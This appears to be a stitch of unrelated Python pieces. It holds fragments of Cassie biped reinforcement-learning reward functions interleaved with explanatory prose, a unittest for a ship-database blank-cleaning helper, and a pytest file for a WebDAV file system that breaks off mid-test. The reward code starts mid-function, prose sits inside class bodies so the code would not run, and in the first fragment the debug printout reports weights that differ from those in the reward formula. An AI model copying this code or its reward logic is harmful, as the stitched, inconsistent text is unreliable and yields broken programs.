# left_vel_score = np.tan(np.pi/4 * left_vel_clock * normed_left_vel)
# right_frc_score = np.tan(np.pi/4 * right_frc_clock * normed_right_frc)
# right_vel_score = np.tan(np.pi/4 * right_vel_clock * normed_right_vel)
foot_frc_score = left_frc_score + right_frc_score
foot_vel_score = left_vel_score + right_vel_score
# hip roll velocity penalty
hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
# torque cost
torque = np.asarray(self.cassie_state.motor.torque[:])
torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
# action cost
action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)
reward = 0.250 * foot_frc_score + \
0.350 * foot_vel_score + \
0.200 * np.exp(-com_vel_error) + \
0.100 * np.exp(-(com_orient_error + foot_orient_error)) + \
0.100 * np.exp(-pelvis_motion)
# 0.050 * np.exp(-hip_roll_penalty) + \
# 0.025 * np.exp(-torque_penalty) + \
# 0.025 * np.exp(-action_penalty)
if self.debug:
print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
# print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
# print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))\
print(
f"reward: \t{reward:.2f} / 1.000\n"
f"foot_frc:\t{0.250 * foot_frc_score:.2f} / +-0.250\n"
f"foot_vel:\t{0.250 * foot_vel_score:.2f} / +-0.250\n"
f"com_vel: \t{0.200 * np.exp(-com_vel_error):.2f} / 0.200\n"
f"orient: \t{0.150 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.150\n"
f"pelvis: \t{0.150 * np.exp(-pelvis_motion):.2f} / 0.150\n"
# f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
# f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
# f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
)
print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
return reward
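The two reward functions shape the clock score differently: clock_reward uses np.tan(np.pi/4 * x), which is convex on [0, 1] and hits exactly 1.0 only when the clock and the normalized foot quantity are both saturated, while early_clock_reward uses np.tanh(x), which is concave and pays out more for partial effort (easier gradient early in training). A math-only comparison of the two shapings:

```python
import math

def tan_score(clock, normed):
    """Score shaping used by clock_reward: tan(pi/4 * clock * normed)."""
    return math.tan(math.pi / 4 * clock * normed)

def tanh_score(clock, normed):
    """Score shaping used by early_clock_reward: tanh(clock * normed)."""
    return math.tanh(clock * normed)

# With the clock fully on (+1) and the normalized quantity at its cap (1.0),
# tan(pi/4) is exactly 1, while tanh(1) saturates below 1.  At partial
# effort the ordering flips: tanh is the more generous (concave) shaping.
full_tan, full_tanh = tan_score(1.0, 1.0), tanh_score(1.0, 1.0)
half_tan, half_tanh = tan_score(1.0, 0.5), tanh_score(1.0, 0.5)
```

This matches the docstring's intent: the tanh variant makes reward easier to earn early, and the tan variant pushes a trained policy to fully saturate force/velocity in the correct phase.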
    def no_speed_clock_reward(self, action):
        qpos = np.copy(self.sim.qpos())
        qvel = np.copy(self.sim.qvel())

        # These are used for normalizing the foot forces and velocities
        desired_max_foot_frc = 250
        desired_max_foot_vel = 3.0
        orient_targ = np.array([1, 0, 0, 0])

        # state info
        com_vel = qvel[0]  # only care about x velocity
        # Cap the force and velocity so the policy cannot learn to maximize them during its phase.
        normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
        normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel

        com_orient_error = 0
        foot_orient_error = 0
        com_vel_error = 0
        straight_diff = 0
        foot_vel_error = 0
        foot_frc_error = 0

        # com orient error
        com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
        # foot orient error
        foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
        # com vel error
        com_vel_error += np.linalg.norm(com_vel - self.speed)

        # pelvis motion penalty: straight_diff, height deadzone, pelvis acceleration penalty
        straight_diff = np.abs(qpos[1])  # straight difference penalty
        if straight_diff < 0.05:
            straight_diff = 0
        height_diff = np.abs(qpos[2] - 0.9)  # height deadzone ranges from 0.05 to 0.2 meters depending on speed
        deadzone_size = 0.05 + 0.05 * self.speed
        if height_diff < deadzone_size:
            height_diff = 0
        pelvis_acc = 0.25 * (np.abs(self.cassie_state.pelvis.rotationalVelocity[:]).sum() + np.abs(self.cassie_state.pelvis.translationalAcceleration[:]).sum())
        pelvis_motion = straight_diff + height_diff + pelvis_acc

        # force/vel clock scores
        # These values indicate whether foot forces / vels are desired (1 -> good if forces/vels exist) or penalized (-1 -> bad if forces/vels exist)
        left_frc_clock = self.left_clock[0](self.phase)
        right_frc_clock = self.right_clock[0](self.phase)
        left_vel_clock = self.left_clock[1](self.phase)
        right_vel_clock = self.right_clock[1](self.phase)

        # scaled force/vel reward
        # left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
        # left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
        # right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
        # right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
        # tan(pi/4 * x) also maps [-1, 1] onto [-1, 1], but unlike tanh it reaches
        # exactly +-1 at the ends, so saturating the clock is rewarded more strongly.
        left_frc_score = np.tan(np.pi / 4 * left_frc_clock * normed_left_frc)
        left_vel_score = np.tan(np.pi / 4 * left_vel_clock * normed_left_vel)
        right_frc_score = np.tan(np.pi / 4 * right_frc_clock * normed_right_frc)
        right_vel_score = np.tan(np.pi / 4 * right_vel_clock * normed_right_vel)
        foot_frc_score = left_frc_score + right_frc_score
        foot_vel_score = left_vel_score + right_vel_score

        # hip roll velocity penalty
        hip_roll_penalty = np.abs(qvel[6]) + np.abs(qvel[13])
        # torque cost
        torque = np.asarray(self.cassie_state.motor.torque[:])
        torque_penalty = 0.25 * (sum(np.abs(self.prev_torque - torque)) / len(torque))
        # action cost
        action_penalty = 5 * sum(np.abs(self.prev_action - action)) / len(action)

        reward = 0.250 * foot_frc_score + \
                 0.250 * foot_vel_score + \
                 0.225 * np.exp(-(com_orient_error + foot_orient_error)) + \
                 0.175 * np.exp(-pelvis_motion) + \
                 0.050 * np.exp(-hip_roll_penalty) + \
                 0.025 * np.exp(-torque_penalty) + \
                 0.025 * np.exp(-action_penalty)

        if self.debug:
            print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
            print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
            # print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
            # print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))
            # Note: the printed weights match the reward weights used above.
            print(
                f"reward: \t{reward:.2f} / 1.000\n"
                f"foot_frc:\t{0.250 * foot_frc_score:.2f} / +-0.250\n"
                f"foot_vel:\t{0.250 * foot_vel_score:.2f} / +-0.250\n"
                f"orient: \t{0.225 * np.exp(-(com_orient_error + foot_orient_error)):.2f} / 0.225\n"
                f"pelvis: \t{0.175 * np.exp(-pelvis_motion):.2f} / 0.175\n"
                f"hip_roll:\t{0.050 * np.exp(-hip_roll_penalty):.2f} / 0.050\n"
                f"torque: \t{0.025 * np.exp(-torque_penalty):.2f} / 0.025\n"
                f"action: \t{0.025 * np.exp(-action_penalty):.2f} / 0.025"
            )
            print("actual speed: {}\tcommanded speed: {}\n\n".format(qvel[0], self.speed))
        return reward
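The tan-based shaping used above can be sanity-checked in isolation. A minimal sketch with plain NumPy, independent of the simulator state (`tan_score` is an illustrative helper name, not part of the original code):

```python
import numpy as np

def tan_score(clock, normed):
    # tan(pi/4 * x) maps [-1, 1] onto [-1, 1], hitting exactly +-1 at the ends.
    return np.tan(np.pi / 4 * clock * normed)

# With the clock fully "on" (+1) and the foot force saturated (normed = 1),
# the score reaches 1.0; tanh(1) would only reach ~0.762.
assert np.isclose(tan_score(1.0, 1.0), 1.0)
assert np.isclose(tan_score(-1.0, 1.0), -1.0)
assert np.tanh(1.0) < tan_score(1.0, 1.0)
```

This makes the design choice visible: both shapings are monotone and bounded, but the tan variant gives the policy extra incentive to fully saturate the clocked quantity.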
    def aslip_clock_reward(self, action):
        qpos = np.copy(self.sim.qpos())
        qvel = np.copy(self.sim.qvel())

        # These are used for normalizing the foot forces and velocities
        desired_max_foot_frc = 400
        desired_max_foot_vel = 3.0
        orient_targ = np.array([1, 0, 0, 0])

        # state info
        com_vel = qvel[0]  # only care about x velocity
        # Cap the force and velocity so the policy cannot learn to maximize them during its phase.
        normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
        normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel

        com_orient_error = 0
        foot_orient_error = 0
        com_vel_error = 0
        straight_diff = 0
        foot_vel_error = 0
        foot_frc_error = 0

        # com orient error
        com_orient_error += 10 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)

        # foot orient error
        # foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
        target_q = [1, 0, 0, 0]
        left_actual = self.cassie_state.leftFoot.orientation
        right_actual = self.cassie_state.rightFoot.orientation
        foot_orient_error = 10 * ((1 - np.inner(left_actual, target_q) ** 2) + (1 - np.inner(right_actual, target_q) ** 2))

        # com vel error
        com_vel_error += np.linalg.norm(com_vel - self.speed)

        # straight difference penalty
        straight_diff = np.abs(qpos[1])
        if straight_diff < 0.05:
            straight_diff = 0
        # height deadzone is +- 0.2 meters
        height_diff = np.abs(qpos[2] - 1.0)
        if height_diff < 0.2:
            height_diff = 0
        straight_diff += height_diff

        # force/vel clock scores
        left_frc_clock = self.left_clock[0][0](self.phase)
        right_frc_clock = self.right_clock[0][0](self.phase)
        left_vel_clock = self.left_clock[0][1](self.phase)
        right_vel_clock = self.right_clock[0][1](self.phase)

        left_frc_score = np.tanh(left_frc_clock * normed_left_frc)
        left_vel_score = np.tanh(left_vel_clock * normed_left_vel)
        right_frc_score = np.tanh(right_frc_clock * normed_right_frc)
        right_vel_score = np.tanh(right_vel_clock * normed_right_vel)
        foot_frc_score = left_frc_score + right_frc_score
        foot_vel_score = left_vel_score + right_vel_score

        reward = 0.1 * np.exp(-com_orient_error) + \
                 0.1 * np.exp(-foot_orient_error) + \
                 0.2 * np.exp(-com_vel_error) + \
                 0.1 * np.exp(-straight_diff) + \
                 0.25 * foot_frc_score + \
                 0.25 * foot_vel_score

        if self.debug:
            print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_frc_score: {:.2f}\t t_frc_score: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_score, foot_frc_score))
            print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_vel_score: {:.2f}\t t_vel_score: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_score, foot_vel_score))
            # print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
            # print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))
            print("reward: {12}\nfoot_orient:\t{0:.2f}, % = {1:.2f}\ncom_vel:\t{2:.2f}, % = {3:.2f}\nfoot_frc_score:\t{4:.2f}, % = {5:.2f}\nfoot_vel_score:\t{6:.2f}, % = {7:.2f}\nstraight_diff:\t{8:.2f}, % = {9:.2f}\ncom_orient:\t{10:.2f}, % = {11:.2f}".format(
                0.1 * np.exp(-foot_orient_error), 0.1 * np.exp(-foot_orient_error) / reward * 100,
                0.2 * np.exp(-com_vel_error), 0.2 * np.exp(-com_vel_error) / reward * 100,
                0.25 * foot_frc_score, 0.25 * foot_frc_score / reward * 100,
                0.25 * foot_vel_score, 0.25 * foot_vel_score / reward * 100,
                0.1 * np.exp(-straight_diff), 0.1 * np.exp(-straight_diff) / reward * 100,
                0.1 * np.exp(-com_orient_error), 0.1 * np.exp(-com_orient_error) / reward * 100,
                reward))
            print("actual speed: {}\tcommanded speed: {}\n\n".format(np.linalg.norm(qvel[0:3]), self.speed))
        return reward
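Every orientation term above uses the quadratic quaternion distance `1 - <q_target, q>^2`, which is zero when the two quaternions describe the same rotation and grows with the rotation angle. A standalone check, assuming unit quaternions (`orient_error`, `identity`, and `quarter_turn` are illustrative names, not from the original code):

```python
import numpy as np

def orient_error(q_target, q):
    # 1 - <q_t, q>^2 is invariant to the q/-q ambiguity and equals
    # sin^2(theta/2) for a rotation of angle theta away from the target.
    return 1 - np.inner(q_target, q) ** 2

identity = np.array([1.0, 0.0, 0.0, 0.0])
# 90-degree rotation about z: q = [cos(45deg), 0, 0, sin(45deg)]
quarter_turn = np.array([np.cos(np.pi / 4), 0.0, 0.0, np.sin(np.pi / 4)])

assert orient_error(identity, identity) == 0.0
assert orient_error(identity, -identity) == 0.0  # q and -q are the same rotation
assert np.isclose(orient_error(identity, quarter_turn), 0.5)  # sin^2(45 deg)
```

The sign-invariance is the reason for squaring the inner product: raw `1 - <q_t, q>` would spuriously penalize `-q` even though it is physically the same orientation.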
    def max_vel_clock_reward(self, action):
        qpos = np.copy(self.sim.qpos())
        qvel = np.copy(self.sim.qvel())

        # These are used for normalizing the foot forces and velocities
        desired_max_foot_frc = 400
        desired_max_foot_vel = 3.0
        orient_targ = np.array([1, 0, 0, 0])

        # state info
        com_vel = qvel[0]  # only care about x velocity
        # Cap the force and velocity so the policy cannot learn to maximize them during its phase.
        normed_left_frc = min(self.l_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_right_frc = min(self.r_foot_frc, desired_max_foot_frc) / desired_max_foot_frc
        normed_left_vel = min(np.linalg.norm(self.l_foot_vel), desired_max_foot_vel) / desired_max_foot_vel
        normed_right_vel = min(np.linalg.norm(self.r_foot_vel), desired_max_foot_vel) / desired_max_foot_vel

        com_orient_error = 0
        foot_orient_error = 0
        com_vel_bonus = 0
        straight_diff = 0
        foot_vel_error = 0
        foot_frc_error = 0

        # com orient error
        com_orient_error += 15 * (1 - np.inner(orient_targ, qpos[3:7]) ** 2)
        # foot orient error
        foot_orient_error += 10 * (self.l_foot_orient_cost + self.r_foot_orient_cost)
        # com vel bonus
        com_vel_bonus += com_vel / 3.0

        # straight difference penalty
        straight_diff = np.abs(qpos[1])
        if straight_diff < 0.05:
            straight_diff = 0
        # height deadzone is +- 0.2 meters
        height_diff = np.abs(qpos[2] - 1.0)
        if height_diff < 0.2:
            height_diff = 0
        straight_diff += height_diff

        # force/vel clock scores
        # The clock values indicate whether foot forces / vels are desired at this point
        # in the phase (+1 -> good if forces/vels exist) or penalized (-1 -> bad if they exist)
        left_frc_clock = self.left_clock[0](self.phase)
        right_frc_clock = self.right_clock[0](self.phase)
        left_vel_clock = self.left_clock[1](self.phase)
        right_vel_clock = self.right_clock[1](self.phase)

        left_frc_penalty = np.tanh(left_frc_clock * normed_left_frc)
        left_vel_penalty = np.tanh(left_vel_clock * normed_left_vel)
        right_frc_penalty = np.tanh(right_frc_clock * normed_right_frc)
        right_vel_penalty = np.tanh(right_vel_clock * normed_right_vel)
        foot_frc_penalty = left_frc_penalty + right_frc_penalty
        foot_vel_penalty = left_vel_penalty + right_vel_penalty

        reward = 0.1 * np.exp(-com_orient_error) + \
                 0.1 * np.exp(-foot_orient_error) + \
                 0.1 * np.exp(-straight_diff) + \
                 0.2 * foot_frc_penalty + \
                 0.2 * foot_vel_penalty + \
                 0.3 * com_vel_bonus

        if self.debug:
            print("l_frc phase : {:.2f}\t l_frc applied : {:.2f}\t l_penalty: {:.2f}\t t_penalty: {:.2f}".format(left_frc_clock, normed_left_frc, left_frc_penalty, foot_frc_penalty))
            print("l_vel phase : {:.2f}\t l_vel applied : {:.2f}\t l_penalty: {:.2f}\t t_penalty: {:.2f}".format(left_vel_clock, normed_left_vel, left_vel_penalty, foot_vel_penalty))
            # print("r_frc phase : {:.2f}\t r_frc applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_frc_clock, normed_right_frc, right_frc_penalty, foot_frc_penalty))
            # print("r_vel phase : {:.2f}\t r_vel applied : {:.2f}\t r_penalty: {:.2f}\t t_penalty: {:.2f}".format(right_vel_clock, normed_right_vel, right_vel_penalty, foot_vel_penalty))
            print("reward: {12}\nfoot_orient:\t{0:.2f}, % = {1:.2f}\ncom_vel_bonus:\t{2:.2f}, % = {3:.2f}\nfoot_frc_penalty:\t{4:.2f}, % = {5:.2f}\nfoot_vel_penalty:\t{6:.2f}, % = {7:.2f}\nstraight_diff:\t{8:.2f}, % = {9:.2f}\ncom_orient:\t{10:.2f}, % = {11:.2f}".format(
                0.1 * np.exp(-foot_orient_error), 0.1 * np.exp(-foot_orient_error) / reward * 100,
                0.3 * com_vel_bonus, 0.3 * com_vel_bonus / reward * 100,
                0.2 * foot_frc_penalty, 0.2 * foot_frc_penalty / reward * 100,
                0.2 * foot_vel_penalty, 0.2 * foot_vel_penalty / reward * 100,
                0.1 * np.exp(-straight_diff), 0.1 * np.exp(-straight_diff) / reward * 100,
                0.1 * np.exp(-com_orient_error), 0.1 * np.exp(-com_orient_error) / reward * 100,
                reward))
            print("actual speed: {}\tcommanded speed: {}\n\n".format(np.linalg.norm(qvel[0:3]), self.speed))
        return reward
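Two small patterns recur through all of these reward terms: saturating normalization (anything at or above a cap maps to 1.0) and a deadzone (small errors are forgiven entirely). A minimal sketch with illustrative values — the 250 N cap and 0.05 m width are taken from the code above, but the helper names are hypothetical:

```python
def capped_norm(value, cap):
    # Saturating normalization: the policy gains nothing by pushing
    # the quantity past the cap, since the score plateaus at 1.0.
    return min(value, cap) / cap

def deadzone(error, width):
    # Errors inside the deadzone are forgiven entirely.
    return 0.0 if abs(error) < width else abs(error)

assert capped_norm(125.0, 250.0) == 0.5
assert capped_norm(400.0, 250.0) == 1.0   # saturates at the cap
assert deadzone(0.03, 0.05) == 0.0        # inside the deadzone
assert deadzone(0.10, 0.05) == 0.1
```

The cap prevents reward hacking through extreme impacts, while the deadzone keeps the gradient quiet when the robot is already close enough to its target pose.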
# Source file: db_format_helpers/db_format_helpers_tests/test_set_blanks_to_None.py
# Repository: ThorsteinnAdal/webcrawls_in_singapore_shippinglane (Apache-2.0)

__author__ = 'thorsteinn'
import unittest

from db_format_helpers.set_blanks_to_None import set_blanks_to_None
from db_format_helpers.list_all_field_values import list_all_field_values


class MyTestCase(unittest.TestCase):

    KEYS = ['key1', 'key2', 'key3', 'key4', 'key5', 'key6']

    def set_up_db(self):
        db = {'ship1': {'key1': u'', 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [1, 2, 3]], 'key4': ' sometext ', 'key5': 1, 'key6': u'12'},
              'ship2': {'key1': 12, 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [2, 2, 2]], 'key4': ' sometext ', 'key5': 11, 'key6': u'11'},
              'ship3': {'key1': u'ab', 'key2': u' \n ', 'key3': [['ape', 'cloth', 'rand'], [3, 2, 3]], 'key4': ' sometext ', 'key5': 0, 'key6': u'0'},
              'ship4': {'key1': u' ', 'key2': u'', 'key3': [['ape', 'cloth', 'rand'], [1, 2, 3]], 'key4': ' sometext\n', 'key5': 11.1, 'key6': u'11.1'}}
        return db

    def original_values(self):
        return {'key1': [u'', 12, u'ab', u' '],
                'key2': [u'', u'', u' \n ', u''],
                'key3': [[['ape', 'cloth', 'rand'], [1, 2, 3]],
                         [['ape', 'cloth', 'rand'], [2, 2, 2]],
                         [['ape', 'cloth', 'rand'], [3, 2, 3]],
                         [['ape', 'cloth', 'rand'], [1, 2, 3]]],
                'key4': [' sometext ', ' sometext ', ' sometext ', ' sometext\n'],
                'key5': [1, 11, 0, 11.1],
                'key6': [u'12', u'11', u'0', u'11.1']}

    def assert_db_state(self, db, expected):
        for key in self.KEYS:
            self.assertListEqual(sorted(expected[key]), sorted(list_all_field_values(key, db)))

    def run_sequence(self, changed, **kwargs):
        # Process the keys one at a time; after each call, already-processed keys
        # must show their changed values while untouched keys keep their originals.
        db = self.set_up_db()
        expected = self.original_values()
        self.assert_db_state(db, expected)
        for key in self.KEYS:
            set_blanks_to_None(key, db, **kwargs)
            expected[key] = changed[key]
            self.assert_db_state(db, expected)

    def test_set_blanks_to_None_default(self):
        # Default mode: blank strings become None; all other values are untouched.
        changed = self.original_values()
        changed['key1'] = [None, 12, u'ab', None]
        changed['key2'] = [None, None, None, None]
        self.run_sequence(changed)

    def test_set_blanks_to_None_mayhem(self):
        # trailing_blanks=True additionally strips surrounding whitespace
        # from non-blank strings (key4).
        changed = self.original_values()
        changed['key1'] = [None, 12, u'ab', None]
        changed['key2'] = [None, None, None, None]
        changed['key4'] = ['sometext', 'sometext', 'sometext', 'sometext']
        self.run_sequence(changed, trailing_blanks=True)


if __name__ == '__main__':
    unittest.main()
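The helper under test is defined elsewhere in the repository; a minimal implementation consistent with the assertions above (the actual `set_blanks_to_None` may differ in details) could look like:

```python
def set_blanks_to_None(field, db, trailing_blanks=False):
    # Mutates db in place: for every record, a string value that is empty or
    # pure whitespace becomes None; with trailing_blanks=True, surrounding
    # whitespace is also stripped from non-blank strings.
    # Non-string values (numbers, lists) are left untouched.
    for record in db.values():
        value = record.get(field)
        if isinstance(value, str):
            if value.strip() == '':
                record[field] = None
            elif trailing_blanks:
                record[field] = value.strip()

db = {'a': {'name': '   '}, 'b': {'name': ' bob \n'}}
set_blanks_to_None('name', db, trailing_blanks=True)
assert db['a']['name'] is None
assert db['b']['name'] == 'bob'
```

This matches the two test modes: by default `' sometext '` survives unchanged, while `trailing_blanks=True` collapses it to `'sometext'`.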
97cf72c243f234b280cf434df26e34f5b5323ea5 | 7,950 | py | Python | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 5 | 2019-02-12T01:39:24.000Z | 2020-08-26T12:59:46.000Z | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 12 | 2018-11-04T19:11:23.000Z | 2019-09-26T14:19:36.000Z | cerulean/test/test_webdav_file_system.py | MD-Studio/cerulean | e081f0242494890e26b5ec5e150187c1f130477f | [
"Apache-2.0"
] | 2 | 2019-09-27T11:24:04.000Z | 2020-04-28T07:04:04.000Z | from typing import Dict
import pytest

from cerulean import (
    EntryType, PasswordCredential, Permission, UnsupportedOperationError,
    WebdavFileSystem)
from cerulean.path import AbstractPath


def test_creating_http() -> None:
    with WebdavFileSystem('http://cerulean-test-webdav/files') as f:
        assert (f / '').is_dir()


def test_creating_http_password() -> None:
    credential = PasswordCredential('cerulean', 'kingfisher')
    with WebdavFileSystem('http://cerulean-test-webdav/protected_files',
                          credential) as f:
        assert (f / '').is_dir()


def test_creating_https() -> None:
    with WebdavFileSystem('https://cerulean-test-webdav/files',
                          host_ca_cert_file='/home/cerulean/cerulean_webdav.crt'
                          ) as f:
        assert (f / '').is_dir()


def test_creating_https_password() -> None:
    credential = PasswordCredential('cerulean', 'kingfisher')
    with WebdavFileSystem('https://cerulean-test-webdav/protected_files',
                          credential,
                          host_ca_cert_file='/home/cerulean/cerulean_webdav.crt'
                          ) as f:
        assert (f / '').is_dir()


# Test handling of unsupported features

def test_entry_types(webdav_filesystem_raises: WebdavFileSystem,
                     lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    assert filesystem._entry_type(lpaths['link']) == EntryType.FILE
    with pytest.raises(FileNotFoundError):
        filesystem._entry_type(lpaths['blockdev'])
    with pytest.raises(FileNotFoundError):
        filesystem._entry_type(lpaths['fifo'])

    assert filesystem._is_file(lpaths['link'])
    assert not filesystem._is_file(lpaths['blockdev'])
    assert not filesystem._is_file(lpaths['fifo'])

    assert not filesystem._is_dir(lpaths['link'])
    assert not filesystem._is_dir(lpaths['blockdev'])
    assert not filesystem._is_dir(lpaths['fifo'])


def test_owner(webdav_filesystem_raises: WebdavFileSystem,
               lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    assert filesystem._uid(lpaths['root']) == 0
    assert filesystem._gid(lpaths['root']) == 0


def test_has_permission(webdav_filesystem_raises: WebdavFileSystem,
                        lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
    dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
    for permission in dir_permissions:
        assert filesystem._has_permission(lpaths['root'], permission)
    for permission in file_permissions:
        assert filesystem._has_permission(lpaths['file'], permission)


def test_set_permission(webdav_filesystem_raises: WebdavFileSystem,
                        lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    with pytest.raises(UnsupportedOperationError):
        filesystem._set_permission(lpaths['root'], Permission.OTHERS_READ,
                                   False)


def test_chmod(webdav_filesystem_raises: WebdavFileSystem,
               lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    with pytest.raises(UnsupportedOperationError):
        filesystem._chmod(lpaths['root'], 0o0755)


def test_symlink_to(webdav_filesystem_raises: WebdavFileSystem,
                    lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    with pytest.raises(UnsupportedOperationError):
        filesystem._symlink_to(lpaths['new_file'], lpaths['file'])


def test_readlink(webdav_filesystem_raises: WebdavFileSystem,
                  lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_raises
    lpaths = lpaths_webdav_raises

    with pytest.raises(IOError):
        filesystem._readlink(lpaths['link'], False)
    with pytest.raises(IOError):
        filesystem._readlink(lpaths['link'], True)


def test_entry_types2(webdav_filesystem_quiet: WebdavFileSystem,
                      lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    assert filesystem._entry_type(lpaths['link']) == EntryType.FILE
    with pytest.raises(FileNotFoundError):
        filesystem._entry_type(lpaths['blockdev'])
    with pytest.raises(FileNotFoundError):
        filesystem._entry_type(lpaths['fifo'])
    assert not filesystem._exists(lpaths['blockdev'])

    assert filesystem._is_file(lpaths['link'])
    assert not filesystem._is_file(lpaths['blockdev'])
    assert not filesystem._is_file(lpaths['fifo'])

    assert not filesystem._is_dir(lpaths['link'])
    assert not filesystem._is_dir(lpaths['blockdev'])
    assert not filesystem._is_dir(lpaths['fifo'])


def test_owner2(webdav_filesystem_quiet: WebdavFileSystem,
                lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    assert filesystem._uid(lpaths['root']) == 0
    assert filesystem._gid(lpaths['root']) == 0


def test_has_permission2(webdav_filesystem_quiet: WebdavFileSystem,
                         lpaths_webdav_raises: Dict[str, AbstractPath]
                         ) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
    dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
    for permission in dir_permissions:
        assert filesystem._has_permission(lpaths['root'], permission)
    for permission in file_permissions:
        assert filesystem._has_permission(lpaths['file'], permission)


def test_set_permission2(
        webdav_filesystem_quiet: WebdavFileSystem,
        lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    filesystem._set_permission(lpaths['root'], Permission.OTHERS_READ, True)

    file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
    dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
    for permission in dir_permissions:
        assert filesystem._has_permission(lpaths['root'], permission)


def test_chmod2(webdav_filesystem_quiet: WebdavFileSystem,
                lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

